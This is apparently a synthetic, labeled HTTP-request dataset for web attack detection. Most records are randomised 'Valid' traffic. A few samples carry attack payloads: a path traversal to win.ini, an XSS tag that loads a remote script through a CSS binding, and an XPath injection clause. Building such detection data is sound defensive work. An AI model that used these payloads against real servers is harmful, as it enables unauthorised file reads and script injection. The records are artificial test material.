Trailer: Warning
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 8.2; lo-ot; rv:9.3.2) Gecko/66657157
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 539x1733
Via: HTTP/6.2 www.aeed.jpg, HTTP/0.2 85.217.174.222
Transfer-Encoding: aotee; dHqlhX3d=uadsenr
Upgrade: u9iTI/6.5, 3wch/6.2, lNtre/1.1, oAhiht/7.8, 2iee/2.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 30560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26220
Start - Id: 23955
class: Valid
GET /85s_DOqmIXQ3G8EooHeJ/qEBqD2GPx_.s6CwS9/sOeUGphplR/n4iy/w4m7.swf?Et4agohgwnatz=enhoZhqestekaaips&Eg=efxDj&zfgeueeeee0ot=nph-fr4uniont%24aEorz&v6w2ni_@STxmlk=gdRQ1AXCDQFy&3ayl9o=73&rilxayeigi0k=95924&menf1At=37061&0diae=ep&ohitdabn=e0M1&8soeei=a%3Attbetweenu+t%3Dtttzyls&yt=dsap%29twltrTerk8oall HTTP/1.1
Host: 193.220.191.188:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: windows-1250;q=0.5, iso-8859-2;q=0.0, euc-kr, utf-8;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: a='h1tydeeT'
Client-ip: 237.51.196.149
Cookie: wSyet3acqogrM=r4w5yjyzQ-xq;tttctabLNraw=734252;rsotag=antroqso;riaiacker=4535;an9=-
Cookie2: $Version="843"
Date: Sun, 26 Feb 06 04:20:09 CET
ETag: W/"FvkHj8C9bQkH4Xda@"
Expect: teh2c=f8EkwEre;8i8hk9
From: hhia@RXgEevnUs.cz
If-Modified-Since: Mon, 13 Feb 06 06:47:54 CET
If-Unmodified-Since: Wed, 17 Oct 07 13:26:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Oct 09 19:58:55 UTC
Max-Forwards: 3919
MIME-Version: 9.0
Pragma: 9='t8awt0'
Proxy-Authorization: Digest username="hihrci"
Authorization: Digest response="2bD32cdffd5FfF32c6a87FbDeBb86470"
Range: 074-7647,9-,-3
Referer: /tu8trt6/etrEect.txt
TE: chunked;q=0.6,deflate
Trailer: Referer
User-Agent: odeiaaae/2.2.0
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 916x209
Via: 3.2 120.118.25.127
Transfer-Encoding: deflate
Upgrade: aehr/3.4, ioW/9.5
Warning: 716 www.snsnMln.gif "7ithne" 
X-Forwarded-For: 16.106.202.140
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23955
Start - Id: 1502
class: Valid
GET /42kaghobocpwntwi/FZUhzXTssfSr09/n@F.3GbBxIyq7kGJQ/u9BD7@LPq.wM5B@.sh? HTTP/1.0
Host: 200.43.195.3
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=39623
Client-ip: 60.76.109.239
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="26"
Date: Wed, 21 Dec 05 07:16:12 GMT
ETag: "2hpiJIqnZpGoazCQc8"
Expect: ysnoei=wEEa;me8t2m=hshs
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Wed, 26 Nov 08 22:22:23 GMT
If-Unmodified-Since: Tue, 13 Apr 04 03:57:00 CET
If-Match: *
If-None-Match: "NAPie-QZUPSqiyypeD"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.1
Pragma: m='sfrJl1f'
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: eIrl iD0eim=SnhJN8
Range: 460-9787,-3
Referer: /rCandRt9/fnaOyna1.html
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.7 (Windows; U; Win98 9.4; ew-hp; rv:4.0.8) Gecko/73460014
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 1.7 39.50.250.12
Transfer-Encoding: sedig; tsnf=htdl6
Upgrade: S6gk/9.9, Aoe/4.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1502
Start - Id: 2322
class: Valid
GET /IKv-LYincludeeQWmYGprocessing-instructions/Itgeisr/insertT9TperlT/ipcsrbweysdst/anc/l@oWKwXkMit/num/eohoHgysgeGtagi5-i.shtml?TEh87s=fvcRa&auisehh=h%7Eit&ta0oc=effe0dg&rlc2update6Z=626902&1a=80803&heGldBym9=%40wtcopyih-ss6ug1%28l&eerme=7233018&lgZdocumentQ@HdropLo=a+2K&L-.TgLUVd=4eheh HTTP/1.1
Host: www.dc77doqr.cz
Connection: keep-alive
Accept: video/*, video/*, video/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=153
Client-ip: 41.89.202.83
Cookie: Tr5ton=yasl
Cookie2: $Version="34"
Date: Mon, 05 Feb 07 24:11:08 CET
ETag: W/"12r_mDVpIiXqbKs@hcS9"
Expect: 100-continue
From: omno@duATd.net
If-Modified-Since: Sun, 13 Aug 06 19:29:30 UTC
If-Unmodified-Since: Sat, 17 Oct 09 21:20:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6135
MIME-Version: 2.6
Pragma: ottAN='anaeO1Ix'
Proxy-Authorization: NTLM dGNhMkhhRWU2bHNhaGF5d29ob2VvdWx0d2Vpc2Fjc2dpdDN0aXRvY25pd0g=
Authorization: hhnito fetedo=4ssoEtpN
Range: 825-
Referer: http://w8sydm.gov/bhiah/t4rt/twasuo/mseonce.fgf
TE: deflate
Trailer: TE
User-Agent: Mozilla/2.2 (compatible; MSIE 3.5; Windows NT; jYntdai)
UA-CPU: MIPS
UA-Disp: 807,1413,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7300x0882
Via: 5.6 www.utceesc.htm
Transfer-Encoding: deflate
Upgrade: stlths/7.3, teu/6.6, sll/3.7
Warning: 586 www.inoRe.js "oeml9nhheLlz" "Sat, 06 Oct 07 24:28:15 CET"
X-Forwarded-For: 250.186.179.59
X-Serial-Number: 61486796053346804
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2322
Start - Id: 27894
class: Valid
GET /up/AruaiSibBfecrh8eN6/eswisent/QcopyZoizZaim4a/mpedJ7o/oS@A/me3hw/lceh9u9yhtaoshlne/script81BRC/rCjrd2ydesUmce/cWTNhswUxqLSh/ith7kOdivf.js?uYSC@HD.xl_=fSs_Dd&iap5h=gAEnfGRm HTTP/1.0
Host: 246.252.62.37:80
Connection: erng
Accept: */*;q=0.9
Accept-Charset: macintosh, euc-jp, iso-8859-2, windows-1250;q=0.7, us-ascii;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: e4odd='uknhml2s'
Client-ip: 55.159.118.14
Cookie: sh=qdL>oreplaceebOdtwhere 3;ofycu=oYl86dY;oAhrMsseegbdme=45437383
Cookie2: $Version="414"
Date: Tue, 12 Feb 08 13:03:03 GMT
ETag: "qW9BFXsLvpyZ1Nt"
Expect: adoNaao
From: naOe@fsh5cXZ.uk
If-Modified-Since: Sat, 27 Feb 10 15:47:33 GMT
If-Unmodified-Since: Sat, 06 Oct 07 13:12:51 GMT
If-Match: "Gh6XlrsZVjyay7AG2j5m"
If-None-Match: "x2V5X11rCsYQZ-ATg"
If-Range: *
Max-Forwards: 6998
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: aettn eirbLbai=7jxtaai
Authorization: isawd radt=iahu
Range: 6-04307,08-
Referer: http://jnenAeyf.gov/o90ugs/xw6cfe.png
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: 3as1a7 (altC7z; e.hHoX6; kwHKop; iTr6pH; eCRMm79y)
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 869x220
Via: HTTP/6.0 www.yoUPe4i.shtml
Transfer-Encoding: gzip
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 729 145.90.231.141 "3eaErmadimLiprnrhIe" "Tue, 13 Dec 05 17:49:23 GMT"
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 83189653333484
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27894
Start - Id: 45120
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.tehnn.de
Connection: keep-alive
Accept: application/rtf, text/plain, image/gif;q=0.6
Accept-Charset: x-mac-japanese
Accept-Encoding: gzip;q=0.8, compress;q=0.2, compress;q=0.8, gzip;q=0.3
Accept-Language: omdi-eedHrlsr, rS3dtwm-rke;q=0.0, wiCchuat-0tar, pg-eejaenr;q=0.3, 7ohh5nno-nsnle6
Cache-Control: no-transform
Client-ip: 189.198.0.35
Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="35"
Date: Thu, 25 Sep 08 08:18:43 UTC
ETag: W/"M6@cazmkokCWUTxYz"
Expect: uhxrdEf=ynXs4rl3
From: lmfapce@abHed.be
If-Modified-Since: Fri, 30 Dec 05 12:13:28 GMT
If-Unmodified-Since: Fri, 01 Feb 08 09:08:32 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jun 04 04:28:51 GMT
Max-Forwards: 41
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: http://karmne.ch/ste7oys/eheTr/I9ez/ety85.pdf
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 7.6; gl-di; rv:5.6.0) Gecko/45811173
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: lbc/5.9 43.64.193.222, HTTP/0.9 133.29.83.73:6
Transfer-Encoding: gzip
Upgrade: tist/2.4, eyl/9.6
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45120
Start - Id: 2618
class: Valid
GET /lilUbGE1B@C4FJTMqJ/6maperlgroup byR-gdeleteHw/eitmelEtHRto/nUNXV47/eRrehfuiP/9CnoGyaywAZ4T.iTZ/prlbss3auoh/c0u4wenH38wjkeZ9/tYmvO0_TlecZzv/n6PAl3bGBmk85n_9oYh.pl?mqmnmocltrd=CtuaYagwisamtohl&sctaassdepuLo=885&eo=4702 HTTP/1.1
Host: 180.224.248.217:6639
Connection: keep-alive
Accept: video/quicktime;q=0.4, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: SiRas4a-AoAnyhe;q=0.9, 3cndehh-si6Fdh
Cache-Control: no-cache
Client-ip: 16.249.92.210
Cookie: 6Ond6atfcre=mailcn<;heNmnq=rihEe)qct;5n8_ZM7tFin=8
Cookie2: $Version="359"
Date: Mon, 25 May 09 07:25:19 GMT
ETag: "Q-eSxUs2supfHmruUeEP"
Expect: eorh=hOsit5;eeeed
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Sat, 20 Dec 08 22:17:38 CET
If-Unmodified-Since: Wed, 05 Dec 07 14:19:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 16 May 06 06:14:58 GMT
Max-Forwards: 52
MIME-Version: 5.4
Pragma: fWjm=ieua
Proxy-Authorization: tonpde EEnuou5a=aesdRdtr
Authorization: NTLM cGhiblVvYWExYWZ0ZzBzY1dtaGRvZ3llcmEzZGFmbW5ob3RoSGdm
Range: -4867,365974-
Referer: http://senrb.com/trrzlr/lsrgLee/fVaCiEh.swf
TE: trailers,gzip;q=0.2
Trailer: User-Agent
User-Agent: Ttelfcy/1.9.9.7
UA-CPU: 68000
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 9.1 72.48.195.24, 4.5 178.248.80.207
Transfer-Encoding: gzip
Upgrade: riwd/2.7
Warning: 490 www.edeoica.css "irieceeHr1udvocili" "Sat, 01 Apr 06 08:34:39 GMT"
X-Forwarded-For: 35.160.78.10
X-Serial-Number: 0105225738
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2618
Start - Id: 23636
class: Valid
GET /roBNWU-FQ0iz/h86lk0wfd9il-cKM/amgqaoumgs6FfulhtTtf/rx0q0/awKjYzXOtC./na2/cpe0emo2zieilm/Pw/on3h.msf?IE=s&n2mulEeny=crcpRiclaytirdr%27a%7Ewget8rR HTTP/1.0
Host: 226.81.125.243
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: cp-932, shift_jis, euc-jp
Accept-Encoding: deflate, identity;q=0.0
Accept-Language: *
Cache-Control: min-fresh=64843
Client-ip: 88.47.180.4
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="458"
Date: Mon, 08 Oct 07 18:43:40 UTC
ETag: "XIQI_03OH24JNGEZ"
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Sun, 05 Dec 04 09:40:43 CET
If-Unmodified-Since: Mon, 21 Aug 06 21:10:42 UTC
If-Match: "Z8ZZ24MeBPNp_H@"
If-None-Match: *
If-Range: "kgWx5IB-dbvyiUjuF"
Max-Forwards: 0183
MIME-Version: 4.9
Pragma: iW='eioo'
Proxy-Authorization: ts2t eudaha=Usambx
Authorization: Basic Y2RzTWk0YXM6Znl1aW9v
Range: 13344-7165,79151-
Referer: http://ziou.gov/rrsCle/Syn8zbu.cgi
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.9 (X11; U; Linux i586 0.8; e7-6s; rv:3.3.8) Gecko/88471939
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 361x375
Via: 5.2 196.225.33.82, 2.4 91.230.17.119
Transfer-Encoding: deflate
Upgrade: nessN/8.6
Warning: 398 www.tooa.css:63777 "eytbc" "Tue, 06 Sep 05 04:00:11 UTC"
X-Forwarded-For: 151.73.41.255
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23636
Start - Id: 13402
class: Valid
GET /eomeYinetakaeeo0cttt/nK@ccajtqHsfy-.S0/pl4nqdcgVgmmed/n7wwhtshjaoci9dm/tesA0edihnhhpnm/rcpCftpQ/fNetldAtZ3jUY.dll?np9iadias=%27NoG%3Ee8toe%2Bhomea%40&48wbkd=eHEkFj_&1nqeAkemieh=3890884&rb=uikztltnt&S1BUk=bYho0hd&mu=bSoiu&updateOallQW=668&darDcT=577479&5hjjsouflsJdocumentB=ogSQebene&jcOo=7064744138&WrefNardykad=ne&htlt=iaashttpaspc&xqitsnpg=640025&tipAenmdss=%7C9 HTTP/1.0
Host: www.sexn.st:80
Connection: lrsv
Accept: application/*, application/x-tar, text/*;q=0.2
Accept-Charset: iso-2022-kr;q=0.1, x-mac-arabic;q=0.4, windows-874, iso-8859-8;q=0.2, windows-1251;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 159.32.190.111
Cookie: p33ii=6607875042
Cookie2: $Version="835"
Date: Fri, 06 Aug 04 13:09:07 GMT
ETag: W/"2rEb9PyIEKZaRygZz8G"
Expect: 100-continue
From: eLfi@jwo4ip.biz
If-Modified-Since: Thu, 20 Jan 05 19:31:30 GMT
If-Unmodified-Since: Fri, 29 Jan 10 14:04:24 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Apr 10 07:48:08 CET
Max-Forwards: 4
MIME-Version: 7.2
Pragma: r=y4fh
Proxy-Authorization: Basic MlNtcmR3bmc6YWx3enQ=
Authorization: cox0 nsasnim=3htbe
Range: -95
Referer: http://www.pnos.fr/qlea2ei/ohas.jpeg
TE: trailers,chunked,gzip;q=0.5
Trailer: Trailer
User-Agent: rthsggoq2nkt9v
UA-CPU: StrongARM
UA-Disp: 1663,7844,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 191x7499
Via: FTP/6.8 www.f9ine.js:14172, 5.5 www.lfwSa.js:056, 9.8 108.227.203.158
Transfer-Encoding: identity
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 526 9.7.18.225 "vsOMettmeid" "Mon, 21 May 07 03:48:28 GMT"
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 92696306703
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13402
Start - Id: 14439
class: Valid
GET /uT/tQ/e0lr1iJV0ah7/haseei8sa/pI/vFyC-JoPCSRrz/i-I/aironmphexis0e.js?nuuztlfdpgre=t6ot&oiehoGe=14261&PtAfZ1nEt=nnjHH8tVd&agbtetysynrfmk=9&yrahhfnaah3e4=%5Dtmail%5Dm&dZZ6wOY=E6d HTTP/1.1
Host: www.stotaix.st
Connection: keep-alive
Accept: text/*, image/gif
Accept-Charset: iso-8859-1, iso-2022-kr, x-mac-chinesetrad, macintosh;q=0.2, cp-936
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=105
Client-ip: 255.146.199.17
Cookie: cUbeittmcO0tn9=iDydjt1i;T2t=189;nlsgaewkti=la(usrdnf;aai=579864
Cookie2: $Version="52"
Date: Mon, 24 Jan 05 19:45:12 GMT
ETag: "LP9hdv0ROyxSDSQ0Q"
Expect: Omc9ej=p5xe;wwtSsr=9tcttonf
From: inuozal@th8rsa.cz
If-Modified-Since: Mon, 24 Mar 08 05:07:07 CET
If-Unmodified-Since: Sat, 02 May 09 11:53:58 CET
If-Match: "KYvUG1hk6FXJcZuEIy"
If-None-Match: "KXBGF_O5Pm95hI2"
If-Range: *
Max-Forwards: 8164
MIME-Version: 3.0
Pragma: w8ba1qa='1rc'
Proxy-Authorization: Basic aHJpVGF0OmR0YXM=
Authorization: Digest nonce
Range: -517,627-,587-701
Referer: http://www.lcalwme.be/Eiio/ttld.msf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: aTd0Fi http://www.rn1ou6.it
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: FTP/9.4 www.sGT6ac.jpg, HTTP/0.9 www.oeEjnip.js, HTTP/8.1 www.foga.gif:74
Transfer-Encoding: gzip
Upgrade: swrIch/2.0, cnp/1.4, Ms3ey/4.3, Enm/6.8
Warning: 911 210.154.148.64:79509 "nSegnrTydntaq" "Sat, 03 Mar 07 18:23:10 CET"
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 716388
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14439
Start - Id: 33747
class: Valid
POST /dO-Z3XVI/aWSGsb8UI1/noIee/clh3nsbrs6t/hg/vMNse6acceptijwindow.openUlb/nlytF7apEdrs5yhuotie/7tpdbivsla9tIsaj/eWW0Ro_Nx1V/eFb2KqNZZZIXxYK/aE7v52wDCE.msf? HTTP/1.0
Content-Length: 240
Content-Language: ha3l,0Yrw3t,1e
Content-Encoding: identity
Content-Location: http://oosf.cz/efistl/Seieet.mp3
Content-MD5: dGVsdnR5c2V0bkhtaXVlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 09 07:13:21 UTC
Last-Modified: Mon, 25 Feb 08 16:35:23 CET
Host: www.Ndcucldtw.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 86.100.242.130
Cookie: obd2aoit=9aoT9penarndsl6eot
Cookie2: $Version="69"
Date: Tue, 16 Nov 04 15:50:27 UTC
ETag: "MsGdp5wimBxp1SC2-0"
Expect: 100-continue
From: ocSTi@saeeTeucT.ch
If-Modified-Since: Thu, 17 Jul 08 22:37:54 CET
If-Unmodified-Since: Sun, 12 Dec 04 18:20:11 UTC
If-Match: "WpK.PbRPST8WgJ0"
If-None-Match: *
If-Range: Fri, 06 Jul 07 12:59:16 CET
Max-Forwards: 19
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic MmhuaGQ6bHNucg==
Range: 157212-,-82365,95975-54243
Referer: /Vpaheiss.png
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 2.5; bg-iL; rv:0.3.7) Gecko/15147425
UA-CPU: StrongARM
UA-Disp: 020,4035,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 520x205
Via: 8.9 11.238.25.136
Transfer-Encoding: compress
Upgrade: tdieig/6.9, dseib5/3.2, tse/9.5, xt7c/9.8
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 79.156.30.170
X-Serial-Number: 695598853636
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eannlh2xgnr=l1C1D&aaimtcaromxnw=66&tVphpdG42zzY_a=9845&eenEyH7emrsv=eoaO6WRetS0c2h7r'ctaccept&ncGvhi=pmntosoIae4etyasm&Hdiq=2093&unionsg9=yacevale>sa&eerdssSeB=93668&r6n=lyhaving&fpdingstxmtt5=140&hCckR=talHsrne eem&kwmcssnYum1=57748898

End - Id: 33747
Start - Id: 46967
class: XSS
GET /6@/kzLIdG/iple96iiht.pl?d5bsgx=6+ZaubyoiddocumentObetweenO%3Fiinaod&ae0hD1Eene=40134&meqhotu=1022&Skmjeahgptsra=e%2Fe4eeliTse&am=%3Cdiv++++style+++%3D++++%22++++binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.linare.com%2Fscript%2FawtdNtep.bin%5D%29%3B++%22+%3E&sy=93&esyenyeat=ndoacu&ROqEe=+enl%5Cniaba8tmpm+cmd&oisTsrbznt=vnttascljoR%2F%25h&rbE6AiV=226&EEUryTt=036023 HTTP/1.1
Host: 175.35.220.172
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 62.241.33.36
Date: Tue, 28 Mar 06 16:08:19 GMT
If-Modified-Since: Tue, 21 Feb 06 22:24:34 GMT
If-Unmodified-Since: Sun, 15 Mar 09 18:17:48 UTC
If-Match: *
Max-Forwards: 5087
Authorization: Eerac anvo=tixcbx
Referer: http://www.pIEatami.biz/zraKah1/qsone9/tsxsa/pirnd/tdtr.html
TE: trailers,deflate,trailers
User-Agent: erJ0gNP http://www.blc0uctn.be
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 

null

End - Id: 46967
Start - Id: 28441
class: Valid
GET /e0RSaHs/ohs2neny3eai8de6er.html?xttI=4312 HTTP/1.0
Host: www.Tycnm.biz:80
Connection: yUvcwhit
Accept: */*
Accept-Charset: iso-8859-4;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 23.125.235.155
Cookie: cechtaeo=7jan8;S8SS2kzm=?8D;tt=8
Cookie2: $Version="10"
Date: Wed, 29 Nov 06 07:55:00 UTC
ETag: W/"wx@4aUT4-7-aW_M"
Expect: ddcrtF
From: oBcae9t@txO3eond.biz
If-Modified-Since: Tue, 23 Mar 10 01:38:51 GMT
If-Unmodified-Since: Mon, 14 Dec 09 20:11:20 UTC
If-Match: "WlQq5C5o9ijlKxnWyxX"
If-None-Match: "_XAuVIrSDSHHIdh"
If-Range: Mon, 24 Aug 09 12:30:43 CET
Max-Forwards: 4
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: lewce SsheN=temsyl
Authorization: NTLM ZW5lbVduZG50dDFoaHRyaUlpc293ZWh6Y240YW9UZXlsMnQ=
Range: 73994-97349,-960
Referer: http://www.yso6.st/AhlFd5eg/LatU/cosk5a.tiff
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (compatible; MSIE 4.4; Open BSD i586; 4adps)
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3420x5548
Via: 8.4 www.Syxmlb.shtml
Transfer-Encoding: gzip
Upgrade: 7t3eo/4.1, aetae/9.1, fEe/9.1, shiotn/1.3, jNe/2.0
Warning: 767 www.EeowrQT.jpg "t1heot" 
X-Forwarded-For: 34.125.43.206
X-Serial-Number: 15983235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28441
Start - Id: 11294
class: Valid
GET /evantsecaiEhtn/iieieal/xa/lm/az0Xhavingdu@_fe/cdMLV6i2osCzaoRxZ/4zl9cXWIZOMI9tH/@XzJ3GhomevNvIPadmin9G/ukRhOrdms6DdP/to.nsf?uangaw=46&T7qrtstpl2w=24096266&lti4niS=21168394 HTTP/1.1
Host: www.ehtnte.de
Connection: o1qf55
Accept: text/*, audio/basic;q=0.7, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 32.11.144.237
Cookie: an=aqme
Cookie2: $Version="3"
Date: Wed, 25 Jan 06 24:39:39 UTC
ETag: W/"N6UhJh3uuUZ0SFN0"
Expect: ur2opT=nBatdxed;nhvan
From: 4cti@hliept.be
If-Modified-Since: Sat, 05 Jan 08 08:01:32 GMT
If-Unmodified-Since: Thu, 11 Mar 04 01:34:38 CET
If-Match: *
If-None-Match: "CjI3W4.UhtZLbnXOfL"
If-Range: "ANWTWgRx5.JryRoj"
Max-Forwards: 589
MIME-Version: 2.7
Pragma: wtemaey='epm9fPw'
Proxy-Authorization: Digest nc=3c06C92E
Authorization: NTLM b211N2NpclNzaWNkcnJyZTVpc21nZWp0SFdoZmxtbjJobGVsZW5pRXpnaHR0bnVl
Range: 51-551841
Referer: /cniTr.nsf
TE: gzip;q=0.5,chunked
Trailer: Date
User-Agent: Mozilla/4.2 (compatible; 5eah; WinNT; DR1A7; sfonOtptt; nutaaeE)
UA-CPU: StrongARM
UA-Disp: 2659,0505,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2360x349
Via: FTP/4.3 www.mlIh.jpg:7488
Transfer-Encoding: identity
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 665 8.130.241.150:99 "miciymt" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11294
Start - Id: 48760
class: XPathInjection
GET /YRdocumenttmpXolCTGbody/aredtI/dtYcCl5bzV/d4eQSBFijgk/9f2hGuH3/2Qk80G/slbwvUair.jpg?84amescth=sted&hoylfe8eeo=67&nnnee=7sci8r&i1g4loarraba0=6+Aedrm%259eie88noa5fe&At8Eser8lmt=eo-t&c_55-P8=aq&h4ta0lctanE=555&ngaar=lneumont&Lformu5S=i1s&WCEaccess_logFE11services4j=789&DYp9=en%27+++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%27no1iond%27+%3D%27&@nph-LuRfnoAprocessing-instruction=ewas&8shoha=nacNk&hs=r09_nbx2 HTTP/1.0
Host: 206.121.1.148
Connection: keep-alive
Accept: video/mpeg;q=0.7, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: tw-eiay9lEm;q=0.9, s-dkaniok, 0ttl-cyoe;q=0.0, etdd-ea, 4eg-r;q=0.9
Cache-Control: max-stale=12266
Client-ip: 148.5.76.199
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Thu, 22 Oct 09 08:10:32 CET
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Sat, 25 Jun 05 24:33:31 CET
If-Unmodified-Since: Fri, 02 Jul 04 17:23:40 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: *
Max-Forwards: 3800
MIME-Version: 2.5
Pragma: eaar=e
Proxy-Authorization: NTLM dHB5Z29lVGV5YTJzaGVrZWRoYW93cmU4Y2g4dDFkZ2E5UmV3
Authorization: NTLM ZmZpMGlyaXBubUFJNGllb2FycmF4aWVTb2FiYjRhdHNs
